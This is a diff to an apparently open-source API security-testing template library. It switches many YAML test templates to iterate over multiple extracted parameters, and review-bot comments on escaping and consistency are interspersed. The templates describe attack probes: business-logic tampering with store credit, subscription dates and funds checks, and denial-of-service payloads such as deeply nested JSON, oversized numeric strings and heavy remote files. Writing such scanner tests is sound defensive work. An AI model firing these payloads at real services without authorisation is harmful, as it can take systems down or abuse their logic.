@@ -183,7 +184,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${attemptValues} + ${userKey}: ${attemptValues} + for_each_combination: true - validate: response_code: gte: 200 @@ -196,7 +198,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${attemptValues} + ${userKey}: ${attemptValues} + for_each_combination: true - validate: response_code: gte: 200 @@ -209,7 +212,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${attemptValues} + ${userKey}: ${attemptValues} + for_each_combination: true - validate: response_code: gte: 200 @@ -222,7 +226,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${attemptValues} + ${userKey}: ${attemptValues} + for_each_combination: true - validate: response_code: gte: 200 @@ -251,7 +256,8 @@ execute: # attack attempts -2 - req: - modify_body_param: - userKey: ${attemptValues} + ${userKey}: ${attemptValues} + for_each_combination: true - validate: response_code: gte: 200 @@ -264,7 +270,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${attemptValues} + ${userKey}: ${attemptValues} + for_each_combination: true - validate: response_code: gte: 200 @@ -277,7 +284,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${attemptValues} + ${userKey}: ${attemptValues} + for_each_combination: true - validate: response_code: gte: 200 @@ -290,7 +298,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${attemptValues} + ${userKey}: ${attemptValues} + for_each_combination: true - validate: response_code: gte: 200 @@ -303,7 +312,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${attemptValues} + ${userKey}: ${attemptValues} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Input-Validation/BypassRegistrationDeadlineValidation.yml b/Input-Validation/BypassRegistrationDeadlineValidation.yml index 4565bbcd7..73b1f85f8 100644 
--- a/Input-Validation/BypassRegistrationDeadlineValidation.yml +++ b/Input-Validation/BypassRegistrationDeadlineValidation.yml @@ -74,21 +74,21 @@ api_selection_filters: for_one: key: regex: "${probableInputParameters}" - extract: userKey1 + extractMultiple: userKey1 value: regex: "\b\\d{4}-\\d{2}-\\d{2}\b" - request_payload: for_one: key: regex: "${probableInputParameters}" - extract: userKey2 + extractMultiple: userKey2 value: datatype: number - request_payload: for_one: key: regex: "${probableInputParameters}" - extract: userKey3 + extractMultiple: userKey3 value: regex: "\b\\d{10}\b" @@ -188,11 +188,14 @@ execute: requests: - req: - modify_body_param: - userKey2: "1*${attemptValues4}" + ${userKey2}: "1*${attemptValues4}" + for_each_combination: true - modify_body_param: - userKey3: "${attemptValues4}" + ${userKey3}: "${attemptValues4}" + for_each_combination: true - modify_body_param: - userKey1: ${attemptValues3} + ${userKey1}: ${attemptValues3} + for_each_combination: true - validate: response_code: gte: 200 @@ -235,11 +238,14 @@ execute: - failure: exit - req: - modify_body_param: - userKey2: "1*${attemptValues2}" + ${userKey2}: "1*${attemptValues2}" + for_each_combination: true - modify_body_param: - userKey3: "${attemptValues2}" + ${userKey3}: "${attemptValues2}" + for_each_combination: true - modify_body_param: - userKey1: ${attemptValues1} + ${userKey1}: ${attemptValues1} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Input-Validation/BypassSubscriptionPauseHandling.yml b/Input-Validation/BypassSubscriptionPauseHandling.yml index 78d4f4299..4e5bfbbe7 100644 --- a/Input-Validation/BypassSubscriptionPauseHandling.yml +++ b/Input-Validation/BypassSubscriptionPauseHandling.yml 
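Review bot: The value filters in the first hunk of BypassRegistrationDeadlineValidation.yml use `"\b\\d{4}-\\d{2}-\\d{2}\b"` and `"\b\\d{10}\b"`, where `\b` inside a double-quoted YAML scalar is the backspace escape, not a regex word boundary. If the loader applies YAML escapes, these patterns require a literal backspace around the date or timestamp and the filter would match no request, so the keys collected by `extractMultiple` would stay empty. Writing `regex: "\\b\\d{4}-\\d{2}-\\d{2}\\b"` and `regex: "\\b\\d{10}\\b"` matches the escaping already used for `\\d`. The same unescaped `\b` is in BypassSubscriptionPauseHandling.yml, ManipulatingSubscriptionDates.yml and in `"\b([1-9][0-9]*)\b"` in InsufficientFundsCheck.yml.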
@@ -75,21 +75,21 @@ api_selection_filters: for_one: key: regex: "${probableInputParameters}" - extract: userKey1 + extractMultiple: userKey1 value: regex: "\b\\d{4}-\\d{2}-\\d{2}\b" - request_payload: for_one: key: regex: "${probableInputParameters}" - extract: userKey2 + extractMultiple: userKey2 value: datatype: number - request_payload: for_one: key: regex: "${probableInputParameters}" - extract: userKey3 + extractMultiple: userKey3 value: regex: "\b\\d{10}\b" @@ -189,11 +189,14 @@ execute: - failure: exit - req: - modify_body_param: - userKey2: "1*${attemptValues2}" + ${userKey2}: "1*${attemptValues2}" + for_each_combination: true - modify_body_param: - userKey3: "${attemptValues2}" + ${userKey3}: "${attemptValues2}" + for_each_combination: true - modify_body_param: - userKey1: ${attemptValues1} + ${userKey1}: ${attemptValues1} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Input-Validation/HeaderInvalidValues.yml b/Input-Validation/HeaderInvalidValues.yml index 6c19f9cd3..61df9317c 100644 --- a/Input-Validation/HeaderInvalidValues.yml +++ b/Input-Validation/HeaderInvalidValues.yml @@ -74,7 +74,7 @@ api_selection_filters: for_one: key: regex: .* - extract: userKey + extractMultiple: userKey value: extract: userVal @@ -91,7 +91,8 @@ execute: - failure: exit - req: - modify_header: - userKey: "${userVal}${attemptValues}" + ${userKey}: "${userVal}${attemptValues}" + for_each_combination: true - validate: response_code: gte: 200 @@ -106,7 +107,8 @@ execute: - failure: x3 - req: - modify_header: - userKey: "${attemptValues}" + ${userKey}: "${attemptValues}" + for_each_combination: true - validate: response_code: gte: 200 @@ -121,7 +123,8 @@ execute: - failure: x4 - req: - modify_header: - userKey: "${attemptValues}${userVal}" + ${userKey}: "${attemptValues}${userVal}" + for_each_combination: true - validate: response_code: gte: 200 
diff --git a/Input-Validation/ImproperCharacterHandling.yml b/Input-Validation/ImproperCharacterHandling.yml index 9019dc2a9..d688d19d5 100644 --- a/Input-Validation/ImproperCharacterHandling.yml +++ b/Input-Validation/ImproperCharacterHandling.yml @@ -72,7 +72,7 @@ api_selection_filters: for_one: key: regex: "${probableInputParameters}" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -111,7 +111,8 @@ execute: requests: - req: - modify_body_param: - userKey: "${invalidCharacters}${userVal}${invalidCharacters}" + ${userKey}: "${invalidCharacters}${userVal}${invalidCharacters}" + for_each_combination: true validate: response_code: gte: 200 diff --git a/Input-Validation/ImproperCurrencyCodeHandling.yml b/Input-Validation/ImproperCurrencyCodeHandling.yml index b334332e1..ae4cf12cb 100644 --- a/Input-Validation/ImproperCurrencyCodeHandling.yml +++ b/Input-Validation/ImproperCurrencyCodeHandling.yml @@ -73,7 +73,7 @@ api_selection_filters: for_one: key: regex: "${probableInputParameters}" - extract: userKey + extractMultiple: userKey wordLists: probableInputParameters: @@ -154,7 +154,8 @@ execute: - failure: x2 - req: - modify_body_param: - userKey: ${attemptValues} + ${userKey}: ${attemptValues} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Input-Validation/ImproperFloatPointHandling.yml b/Input-Validation/ImproperFloatPointHandling.yml index 622d6ad71..8ba489bce 100644 --- a/Input-Validation/ImproperFloatPointHandling.yml +++ b/Input-Validation/ImproperFloatPointHandling.yml @@ -74,7 +74,7 @@ api_selection_filters: for_one: key: regex: "${probableInputParameters}" - extract: userKey + extractMultiple: userKey value: datatype: number extract: userVal @@ -169,7 +169,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${attemptValues} + ${userKey}: ${userVal}${attemptValues} + for_each_combination: true - validate: response_code: gte: 200 
diff --git a/Input-Validation/ImproperPageSizeHandling.yml b/Input-Validation/ImproperPageSizeHandling.yml index bab37c8f2..3ab27f028 100644 --- a/Input-Validation/ImproperPageSizeHandling.yml +++ b/Input-Validation/ImproperPageSizeHandling.yml @@ -75,7 +75,7 @@ api_selection_filters: for_one: key: regex: "(?i)(page[_-]?size|per[_-]?page|limit|items[_-]?per[_-]?page|max[_-]?results|page[_-]?limit)" - extract: limitKey + extractMultiple: limitKey value: extract: limitValue regex: "^\\d+$" @@ -136,7 +136,8 @@ execute: - failure: exit - req: - modify_query_param: - limitKey: ${attemptValues} + ${limitKey}: ${attemptValues} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Input-Validation/InputValidationByReplacingObjectWithPrimitive.yml b/Input-Validation/InputValidationByReplacingObjectWithPrimitive.yml index b1b28203c..5929ce934 100644 --- a/Input-Validation/InputValidationByReplacingObjectWithPrimitive.yml +++ b/Input-Validation/InputValidationByReplacingObjectWithPrimitive.yml @@ -75,7 +75,7 @@ api_selection_filters: for_one: key: regex: .* - extract: userKey + extractMultiple: userKey value: extract: userVal diff --git a/Input-Validation/InputValidationByReplacingParamWithArray.yml b/Input-Validation/InputValidationByReplacingParamWithArray.yml index 4b2c49b67..9dab7c827 100644 --- a/Input-Validation/InputValidationByReplacingParamWithArray.yml +++ b/Input-Validation/InputValidationByReplacingParamWithArray.yml @@ -75,7 +75,7 @@ api_selection_filters: for_one: key: regex: .* - extract: userKey + extractMultiple: userKey value: extract: userVal @@ -92,8 +92,9 @@ execute: - failure: exit - req: - modify_body_param: - userKey: + ${userKey}: - ${userVal} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Input-Validation/InsufficientFundsCheck.yml b/Input-Validation/InsufficientFundsCheck.yml index 9da984162..869213b55 100644 --- a/Input-Validation/InsufficientFundsCheck.yml 
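Review bot: InputValidationByReplacingObjectWithPrimitive.yml only switches the filter to `extractMultiple: userKey`; unlike the neighbouring files, no `execute` hunk accompanies it. If its request step still names the parameter as bare `userKey:`, it would need `${userKey}:` with `for_each_combination: true`, as done in InputValidationByReplacingParamWithArray.yml, to pick up the multi-valued variable. The execute block is outside the diff, so this needs checking against the file; DoSTestJSONBodyKey.yml has the same filter-only change.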
+++ b/Input-Validation/InsufficientFundsCheck.yml @@ -83,7 +83,7 @@ api_selection_filters: for_one: key: regex: "${probableInputParameters}" - extract: userKey + extractMultiple: userKey value: datatype: number extract: userVal @@ -92,7 +92,7 @@ api_selection_filters: for_one: key: regex: "${probableInputParameters}" - extract: userKey2 + extractMultiple: userKey2 value: regex: "\b([1-9][0-9]*)\b" extract: userVal2 @@ -201,9 +201,11 @@ execute: - failure: exit - req: - modify_body_param: - userKey: "${outputUserValue1}*1000" + ${userKey}: "${outputUserValue1}*1000" + for_each_combination: true - modify_body_param: - userKey2: ${outputUserValue1}000 + ${userKey2}: ${outputUserValue1}000 + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Input-Validation/ManipulateAutoRenewal.yml b/Input-Validation/ManipulateAutoRenewal.yml index 66ce54f44..7c12fcdde 100644 --- a/Input-Validation/ManipulateAutoRenewal.yml +++ b/Input-Validation/ManipulateAutoRenewal.yml @@ -80,14 +80,14 @@ api_selection_filters: for_one: key: regex: "${probableInputParameters}" - extract: userKey + extractMultiple: userKey value: datatype: boolean - request_payload: for_one: key: regex: "${probableInputParameters}" - extract: userKey + extractMultiple: userKey value: regex: "^(?i)(true|false)$" wordLists: @@ -135,7 +135,8 @@ execute: requests: - req: - modify_body_param: - userKey: "${failValues}" + ${userKey}: "${failValues}" + for_each_combination: true - validate: response_code: gte: 200 @@ -183,7 +184,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: "${passValues}" + ${userKey}: "${passValues}" + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Input-Validation/ManipulateStoreCredit.yml b/Input-Validation/ManipulateStoreCredit.yml index 9d515bee4..9da87a4ca 100644 --- a/Input-Validation/ManipulateStoreCredit.yml +++ b/Input-Validation/ManipulateStoreCredit.yml 
@@ -79,7 +79,7 @@ api_selection_filters: for_one: key: regex: "${probableInputParameters}" - extract: userKey + extractMultiple: userKey value: extract: userVal @@ -131,7 +131,8 @@ execute: requests: - req: - modify_body_param: - userKey: 100 + ${userKey}: 100 + for_each_combination: true - validate: response_code: gte: 200 @@ -150,7 +151,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: 200 + ${userKey}: 200 + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Input-Validation/ManipulatingSubscriptionDates.yml b/Input-Validation/ManipulatingSubscriptionDates.yml index 9999160f9..fc3d3c247 100644 --- a/Input-Validation/ManipulatingSubscriptionDates.yml +++ b/Input-Validation/ManipulatingSubscriptionDates.yml @@ -74,21 +74,21 @@ api_selection_filters: for_one: key: regex: "${probableInputParameters}" - extract: userKey1 + extractMultiple: userKey1 value: regex: "\b\\d{4}-\\d{2}-\\d{2}\b" - request_payload: for_one: key: regex: "${probableInputParameters}" - extract: userKey2 + extractMultiple: userKey2 value: datatype: number - request_payload: for_one: key: regex: "${probableInputParameters}" - extract: userKey3 + extractMultiple: userKey3 value: regex: "\b\\d{10}\b" @@ -151,11 +151,14 @@ execute: requests: - req: - modify_body_param: - userKey2: "1*${attemptValues4}" + ${userKey2}: "1*${attemptValues4}" + for_each_combination: true - modify_body_param: - userKey3: "${attemptValues4}" + ${userKey3}: "${attemptValues4}" + for_each_combination: true - modify_body_param: - userKey1: ${attemptValues3} + ${userKey1}: ${attemptValues3} + for_each_combination: true - validate: response_code: gte: 200 
@@ -203,11 +206,14 @@ execute: - failure: exit - req: - modify_body_param: - userKey2: "1*${attemptValues2}" + ${userKey2}: "1*${attemptValues2}" + for_each_combination: true - modify_body_param: - userKey3: "${attemptValues2}" + ${userKey3}: "${attemptValues2}" + for_each_combination: true - modify_body_param: - userKey1: ${attemptValues1} + ${userKey1}: ${attemptValues1} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Input-Validation/ManipulatingTimeFrequency.yml b/Input-Validation/ManipulatingTimeFrequency.yml index d335a081a..c8583ca44 100644 --- a/Input-Validation/ManipulatingTimeFrequency.yml +++ b/Input-Validation/ManipulatingTimeFrequency.yml @@ -73,7 +73,7 @@ api_selection_filters: for_one: key: regex: "${probableInputParameters}" - extract: userKey + extractMultiple: userKey wordLists: probableInputParameters: @@ -152,7 +152,8 @@ execute: - failure: x2 - req: - modify_body_param: - userKey: ${sampleValues} + ${userKey}: ${sampleValues} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Input-Validation/NumberValidation.yml b/Input-Validation/NumberValidation.yml index 396f29d47..baa9ff93f 100644 --- a/Input-Validation/NumberValidation.yml +++ b/Input-Validation/NumberValidation.yml @@ -69,7 +69,7 @@ api_selection_filters: for_one: key: regex: .* - extract: userKey + extractMultiple: userKey value: datatype: number extract: userVal @@ -122,7 +122,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${attemptValues} + ${userKey}: ${attemptValues} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Input-Validation/PayloadKeysInvalidValues.yml b/Input-Validation/PayloadKeysInvalidValues.yml index a3d177706..918ec3bb8 100644 --- a/Input-Validation/PayloadKeysInvalidValues.yml +++ b/Input-Validation/PayloadKeysInvalidValues.yml @@ -73,7 +73,7 @@ api_selection_filters: for_one: key: regex: .* - extract: userKey + extractMultiple: userKey value: extract: userVal 
@@ -90,7 +90,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: "${userVal}${attemptValues}" + ${userKey}: "${userVal}${attemptValues}" + for_each_combination: true - validate: response_code: gte: 200 @@ -105,7 +106,8 @@ execute: - failure: x3 - req: - modify_body_param: - userKey: "${attemptValues}" + ${userKey}: "${attemptValues}" + for_each_combination: true - validate: response_code: gte: 200 @@ -120,7 +122,8 @@ execute: - failure: x4 - req: - modify_body_param: - userKey: "${attemptValues}${userVal}" + ${userKey}: "${attemptValues}${userVal}" + for_each_combination: true - validate: response_code: gte: 200 @@ -135,7 +138,8 @@ execute: - failure: x5 - req: - modify_body_param: - userKey: "${attemptValues2}" + ${userKey}: "${attemptValues2}" + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Lack-of-Resources-and-Rate-Limiting/DateFieldInputDoS.yml b/Lack-of-Resources-and-Rate-Limiting/DateFieldInputDoS.yml index a74a54155..524edfc32 100644 --- a/Lack-of-Resources-and-Rate-Limiting/DateFieldInputDoS.yml +++ b/Lack-of-Resources-and-Rate-Limiting/DateFieldInputDoS.yml @@ -101,7 +101,7 @@ api_selection_filters: - report_start - report_end - date - extract: userKey + extractMultiple: userKey - query_param: for_one: key: @@ -139,7 +139,7 @@ api_selection_filters: - reportEnd - report_start - report_end - extract: userKey + extractMultiple: userKey wordLists: explodingDates: - "0000-01-01" @@ -181,9 +181,11 @@ execute: - failure: exit - req: - modify_query_param: - userKey: "${explodingDates}" + ${userKey}: "${explodingDates}" + for_each_combination: true - modify_body_param: - userKey: "${explodingDates}" + ${userKey}: "${explodingDates}" + for_each_combination: true - validate: response_code: gt: 505 diff --git a/Lack-of-Resources-and-Rate-Limiting/DoSDeeplyNestedJSONBody.yml b/Lack-of-Resources-and-Rate-Limiting/DoSDeeplyNestedJSONBody.yml index 0e870a65e..a8cc54c3c 100644 
--- a/Lack-of-Resources-and-Rate-Limiting/DoSDeeplyNestedJSONBody.yml +++ b/Lack-of-Resources-and-Rate-Limiting/DoSDeeplyNestedJSONBody.yml @@ -68,7 +68,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal execute: @@ -113,7 +113,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: "{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":\"${userVal}\"}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}" + ${userKey}: "{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":\"${userVal}\"}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}" + for_each_combination: true - validate: response_code: gt: 505 
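Review bot: The nested payload in DoSDeeplyNestedJSONBody.yml repeats `${userKey}` at every level of the string, and the mapping key is now `${userKey}` with `for_each_combination: true`. With a multi-valued `userKey` it is not clear from the hunk whether all occurrences are bound to the same key within one request or expanded independently, which would multiply the number of generated requests. A comment above the line, `# all ${userKey} occurrences are bound to the same key within one request`, would document the expected behaviour once confirmed. `${userVal}` is still a single `extract`, so it may not belong to the key being iterated.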
diff --git a/Lack-of-Resources-and-Rate-Limiting/DoSTestCSVFileURL.yml b/Lack-of-Resources-and-Rate-Limiting/DoSTestCSVFileURL.yml index bce16626c..eeb9247c4 100644 --- a/Lack-of-Resources-and-Rate-Limiting/DoSTestCSVFileURL.yml +++ b/Lack-of-Resources-and-Rate-Limiting/DoSTestCSVFileURL.yml @@ -71,14 +71,14 @@ api_selection_filters: contains_either: - .csv key: - extract: csv_key + extractMultiple: csv_key - query_param: for_one: value: contains_either: - .csv key: - extract: csv_key + extractMultiple: csv_key execute: type: multiple requests: @@ -121,9 +121,11 @@ execute: - failure: exit - req: - modify_query_param: - csv_key: https://github.com/akto-api-security/tests-library/raw/akto_resources/resources/heavy%20files/file.csv + ${csv_key}: https://github.com/akto-api-security/tests-library/raw/akto_resources/resources/heavy%20files/file.csv + for_each_combination: true - modify_body_param: - csv_key: https://github.com/akto-api-security/tests-library/raw/akto_resources/resources/heavy%20files/file.csv + ${csv_key}: https://github.com/akto-api-security/tests-library/raw/akto_resources/resources/heavy%20files/file.csv + for_each_combination: true - validate: response_code: gt: 505 diff --git a/Lack-of-Resources-and-Rate-Limiting/DoSTestHeaderKey.yml b/Lack-of-Resources-and-Rate-Limiting/DoSTestHeaderKey.yml index 406a21c7d..b592afecb 100644 --- a/Lack-of-Resources-and-Rate-Limiting/DoSTestHeaderKey.yml +++ b/Lack-of-Resources-and-Rate-Limiting/DoSTestHeaderKey.yml @@ -68,7 +68,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: headerKey + extractMultiple: headerKey value: extract: headerValue wordLists: @@ -121,9 +121,10 @@ execute: - success: x2 - failure: exit - req: - - delete_header: headerKey + - delete_header: ${headerKey} - add_header: ${headerParamKeys}: headerValue + for_each_combination: true - validate: response_code: gt: 505 
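Review bot: The `${csv_key}` values in DoSTestCSVFileURL.yml point at a file on the `akto_resources` branch, so the resource this test depends on can change or disappear without any change to the template. Pinning the path to a commit, e.g. `https://raw.githubusercontent.com/akto-api-security/tests-library/<COMMIT_SHA>/resources/heavy%20files/file.csv` (placeholder SHA), would keep results reproducible. This file also uses the `github.com/.../raw/...` form while DoSTestJPGFileURL.yml and DoSTestMP4FileURL.yml use `raw.githubusercontent.com`; the same branch reference applies to both of those.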
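Review bot: In the last `req` of DoSTestHeaderKey.yml the commit converts `delete_header: headerKey` to `${headerKey}` but leaves `${headerParamKeys}: headerValue` as a bare word, although the filter captures the value with `extract: headerValue`. If bare names are not resolved as variables, the added header would carry the literal text `headerValue` instead of the original header's value; `${headerParamKeys}: ${headerValue}` would be consistent with the other edits. `delete_header` takes a scalar and so cannot carry its own `for_each_combination`, so it is worth confirming how a multi-valued `${headerKey}` is handled there.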
diff --git a/Lack-of-Resources-and-Rate-Limiting/DoSTestHeaderValue.yml b/Lack-of-Resources-and-Rate-Limiting/DoSTestHeaderValue.yml index 583c4ecd2..6ece35843 100644 --- a/Lack-of-Resources-and-Rate-Limiting/DoSTestHeaderValue.yml +++ b/Lack-of-Resources-and-Rate-Limiting/DoSTestHeaderValue.yml @@ -67,7 +67,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: headerKey + extractMultiple: headerKey wordLists: headerParamValues: - "999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999" @@ -119,7 +119,8 @@ execute: - failure: exit - req: - modify_header: - headerKey: ${headerParamValues} + ${headerKey}: ${headerParamValues} + for_each_combination: true - validate: response_code: gt: 505 diff --git a/Lack-of-Resources-and-Rate-Limiting/DoSTestJPGFileURL.yml b/Lack-of-Resources-and-Rate-Limiting/DoSTestJPGFileURL.yml index f83cfaa97..f2313d0b2 100644 --- a/Lack-of-Resources-and-Rate-Limiting/DoSTestJPGFileURL.yml +++ b/Lack-of-Resources-and-Rate-Limiting/DoSTestJPGFileURL.yml 
@@ -69,14 +69,14 @@ api_selection_filters: contains_either: - .jpg key: - extract: jpg_key + extractMultiple: jpg_key - query_param: for_one: value: contains_either: - .jpg key: - extract: jpg_key + extractMultiple: jpg_key execute: type: multiple requests: @@ -119,9 +119,11 @@ execute: - failure: exit - req: - modify_query_param: - jpg_key: https://raw.githubusercontent.com/akto-api-security/tests-library/akto_resources/resources/heavy%20files/photo.jpeg + ${jpg_key}: https://raw.githubusercontent.com/akto-api-security/tests-library/akto_resources/resources/heavy%20files/photo.jpeg + for_each_combination: true - modify_body_param: - jpg_key: https://raw.githubusercontent.com/akto-api-security/tests-library/akto_resources/resources/heavy%20files/photo.jpeg + ${jpg_key}: https://raw.githubusercontent.com/akto-api-security/tests-library/akto_resources/resources/heavy%20files/photo.jpeg + for_each_combination: true - validate: response_code: gt: 505 diff --git a/Lack-of-Resources-and-Rate-Limiting/DoSTestJSONBodyKey.yml b/Lack-of-Resources-and-Rate-Limiting/DoSTestJSONBodyKey.yml index 8e2ad3bd3..162dbc553 100644 --- a/Lack-of-Resources-and-Rate-Limiting/DoSTestJSONBodyKey.yml +++ b/Lack-of-Resources-and-Rate-Limiting/DoSTestJSONBodyKey.yml @@ -68,7 +68,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userValue wordLists: diff --git a/Lack-of-Resources-and-Rate-Limiting/DoSTestLongStringQueryParamJSONBodyValues.yml b/Lack-of-Resources-and-Rate-Limiting/DoSTestLongStringQueryParamJSONBodyValues.yml index 1972dc0f2..e69124d6a 100644 --- a/Lack-of-Resources-and-Rate-Limiting/DoSTestLongStringQueryParamJSONBodyValues.yml +++ b/Lack-of-Resources-and-Rate-Limiting/DoSTestLongStringQueryParamJSONBodyValues.yml 
@@ -68,12 +68,12 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey - query_param: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey wordLists: queryParamValues: - "999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999" @@ -125,9 +125,11 @@ execute: - failure: exit - req: - modify_query_param: - userKey: "${queryParamValues}" + ${userKey}: "${queryParamValues}" + for_each_combination: true - modify_body_param: - userKey: "${queryParamValues}" + ${userKey}: "${queryParamValues}" + for_each_combination: true - validate: response_code: gt: 505 diff --git a/Lack-of-Resources-and-Rate-Limiting/DoSTestMP4FileURL.yml b/Lack-of-Resources-and-Rate-Limiting/DoSTestMP4FileURL.yml index 07484f193..38e572fcc 100644 --- a/Lack-of-Resources-and-Rate-Limiting/DoSTestMP4FileURL.yml +++ b/Lack-of-Resources-and-Rate-Limiting/DoSTestMP4FileURL.yml 
@@ -70,14 +70,14 @@ api_selection_filters: contains_either: - .mp4 key: - extract: mp4_key + extractMultiple: mp4_key - query_param: for_one: value: contains_either: - .mp4 key: - extract: mp4_key + extractMultiple: mp4_key execute: type: multiple requests: @@ -121,9 +121,11 @@ execute: - failure: exit - req: - modify_query_param: - mp4_key: https://raw.githubusercontent.com/akto-api-security/tests-library/akto_resources/resources/heavy%20files/video.mp4 + ${mp4_key}: https://raw.githubusercontent.com/akto-api-security/tests-library/akto_resources/resources/heavy%20files/video.mp4 + for_each_combination: true - modify_body_param: - mp4_key: https://raw.githubusercontent.com/akto-api-security/tests-library/akto_resources/resources/heavy%20files/video.mp4 + ${mp4_key}: https://raw.githubusercontent.com/akto-api-security/tests-library/akto_resources/resources/heavy%20files/video.mp4 + for_each_combination: true - validate: response_code: gt: 505 diff --git a/Lack-of-Resources-and-Rate-Limiting/DoSTestPDFFileURL.yml b/Lack-of-Resources-and-Rate-Limiting/DoSTestPDFFileURL.yml index 2d648be81..a77417159 100644 --- a/Lack-of-Resources-and-Rate-Limiting/DoSTestPDFFileURL.yml +++ b/Lack-of-Resources-and-Rate-Limiting/DoSTestPDFFileURL.yml @@ -70,14 +70,14 @@ api_selection_filters: contains_either: - .pdf key: - extract: pdf_key + extractMultiple: pdf_key - query_param: for_one: value: contains_either: - .pdf key: - extract: pdf_key + extractMultiple: pdf_key execute: type: multiple requests: 
@@ -121,9 +121,11 @@ execute: - failure: exit - req: - modify_query_param: - pdf_key: https://github.com/akto-api-security/tests-library/raw/akto_resources/resources/heavy%20files/heavy-pdf.pdf + ${pdf_key}: https://github.com/akto-api-security/tests-library/raw/akto_resources/resources/heavy%20files/heavy-pdf.pdf + for_each_combination: true - modify_body_param: - pdf_key: https://github.com/akto-api-security/tests-library/raw/akto_resources/resources/heavy%20files/heavy-pdf.pdf + ${pdf_key}: https://github.com/akto-api-security/tests-library/raw/akto_resources/resources/heavy%20files/heavy-pdf.pdf + for_each_combination: true - validate: response_code: gt: 505 diff --git a/Lack-of-Resources-and-Rate-Limiting/DoSTestPNGFileURL.yml b/Lack-of-Resources-and-Rate-Limiting/DoSTestPNGFileURL.yml index 0ad36d93d..2f77c7f74 100644 --- a/Lack-of-Resources-and-Rate-Limiting/DoSTestPNGFileURL.yml +++ b/Lack-of-Resources-and-Rate-Limiting/DoSTestPNGFileURL.yml @@ -70,14 +70,14 @@ api_selection_filters: contains_either: - .png key: - extract: png_key + extractMultiple: png_key - query_param: for_one: value: contains_either: - .png key: - extract: png_key + extractMultiple: png_key execute: type: multiple requests: 